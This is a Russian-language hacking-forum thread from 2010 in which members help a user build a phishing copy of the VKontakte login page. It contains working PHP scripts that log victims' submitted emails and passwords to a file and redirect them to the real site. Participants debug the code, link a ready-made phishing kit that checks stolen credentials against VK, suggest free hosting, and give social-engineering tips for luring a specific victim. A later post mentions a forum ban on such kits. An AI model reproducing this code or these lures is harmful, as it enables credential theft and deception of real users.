Нужна помощь с фейком

Discussion in 'PHP' started by Si{R}ius, 27 Jul 2010.

  1. Si{R}ius

    Si{R}ius Member

    Joined:
    13 Nov 2008
    Messages:
    95
    Likes Received:
    36
    Reputations:
    0
    Решил сделать фейк со страницей http://vkontakte.ru/login.php?u=2 , для логирования нашел в инете код
    Code:
    <?php
    
    $f=fopen("log.txt","at"); 
    
    flock($f,2); 
    
    fputs($f, $_POST['email'].";".$_POST['pass']." \n");
    
         header("Location: http://vkontakte.ru/blank.php?code=10");
    
    flock($f,3); 
    
    fclose($f); 
    
    ?>
    
    В лог ничего, кроме разделителя, не писалось при таком раскладе, и я стал менять содержимое index.htm, что тоже не привело к успеху. PHP не знаю, к сожалению, поэтому прошу помощи.

    Также имеется старый рабочий фейк http://slil.ru/29504411 , возможно, какие-то идеи с него пригодяться.
     
  2. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    PHP:
    <?php
     
    if(isset($_POST))
      {
         
    $fh fopen("log.txt""a+");
         
    fwrite($fh"{$_POST[email]}:{$_POST[pass]}\n");
         
    fclose($fh);
       }
      
    header("Location: http://vkontakte.ru/blank.php?code=10");
    ?>
     
  3. Si{R}ius

    Si{R}ius Member

    Joined:
    13 Nov 2008
    Messages:
    95
    Likes Received:
    36
    Reputations:
    0
    geforse, опробовал, но по прежнему записывает в лог только двоеточие.
    Может быть дело в переменных?
    Я насочинял даже такой бред, используя все переменные из index.htm
    Code:
    <?PHP
    $Login = $_POST[login];
    $Pass = $_POST[passwd];
    $L = $_POST[email];
    $Pa = $_POST[pass];
    $Log = $_POST[act];
    $Pas = $_POST[success_url];
    $Logi = $_POST[fail_url];
    $Passs = $_POST[try_to_login];
    $Loginn = $_POST[to];
    $Passss = $_POST[vk];
    $Passsss = $_POST[password];
    $Text = $_POST[text];
    $Expire = $_POST[expire];
    
    $log = fopen("base.php","a+");
    fwrite($log,"\n $Login:$Pass:$L:$Pa:$Log:$Pas:$Logi:$Passs:$Loginn:$Passss:$Passsss:$Text:$Expire \n");
    fclose($log);
    echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://vkontakte.ru'></head></html>";
    ?>
    но это не помогло - даже не представляю, в чем загвоздка
     
  4. SHiNiGaMi

    SHiNiGaMi Banned

    Joined:
    3 Jan 2010
    Messages:
    382
    Likes Received:
    55
    Reputations:
    15
    $_POST на isset всегда дает true, надо конкретно переменные проверять.
     
    1 person likes this.
  5. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    Готовый фейк с
    • двумя страницами авторизации
    • проверкой ввода данных на сервере "Вконтакте"
    • защитой файла БД

    Особо не тестировал, но вроде должно работать.

    Скачать

    з.ы. SHiNiGaMi, полностью согласен, ошибся.
     
  6. Si{R}ius

    Si{R}ius Member

    Joined:
    13 Nov 2008
    Messages:
    95
    Likes Received:
    36
    Reputations:
    0
    Спасибо, а можешь подсказать бесплатный хост с поддержкой курлов? Я нагуглил некоторые, но с их настройками случились проблемы
     
  7. shellz[21h]

    shellz[21h] Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    311
    Likes Received:
    68
    Reputations:
    6
    Если не подводит меня память)
    http://www.110mb.com/
     
  8. Антихрист

    Антихрист New Member

    Joined:
    24 Jul 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Может хостинг не поддерживает глобальные переменные? Нужно заключить переданные данные в обычные переменные!
     
  9. SHiNiGaMi

    SHiNiGaMi Banned

    Joined:
    3 Jan 2010
    Messages:
    382
    Likes Received:
    55
    Reputations:
    15
    Глобальные переменные, это если Register_globals = on, а глобальные массивы GET и POST ты попробуй отключи))
     
  10. Антихрист

    Антихрист New Member

    Joined:
    24 Jul 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Есть хостинги которые не поддерживают!
     
  11. Si{R}ius

    Si{R}ius Member

    Joined:
    13 Nov 2008
    Messages:
    95
    Likes Received:
    36
    Reputations:
    0
    Есть еще маленькая неприятность - вконтакте блочит ссылки на бесплатные хостинги, а жертва сидит только там и по другому впарить ссыль не представляется возможным...это как-то можно исправить?
     
  12. SHiNiGaMi

    SHiNiGaMi Banned

    Joined:
    3 Jan 2010
    Messages:
    382
    Likes Received:
    55
    Reputations:
    15
    СИ(впарить, только не слишком навязчиво, типа "для быстрого перехода нажмите здесь")
    И вообще я думаю что не надо редиректить на blank.php?code=10, надо curl'ом сразу передать на index.php?act=login чтобы после записи в лог юзер попал на настоящий контакт
     
  13. SleyL

    SleyL New Member

    Joined:
    29 Dec 2010
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Перезалейте Плиз кому не трудно.
     
  14. A_n_d_r_e_i

    A_n_d_r_e_i Elder - Старейшина

    Joined:
    2 Sep 2009
    Messages:
    206
    Likes Received:
    279
    Reputations:
    32
    перезаливать никто не будет, а если перезальют - тему\сообщение удалят, поскольку с недавних пор был введен запрет на любое расспространение фейков на античате, пора привыкнуть
    https://forum.antichat.ru/thread248520.html
     
  15. SleyL

    SleyL New Member

    Joined:
    29 Dec 2010
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Спасибо за инфу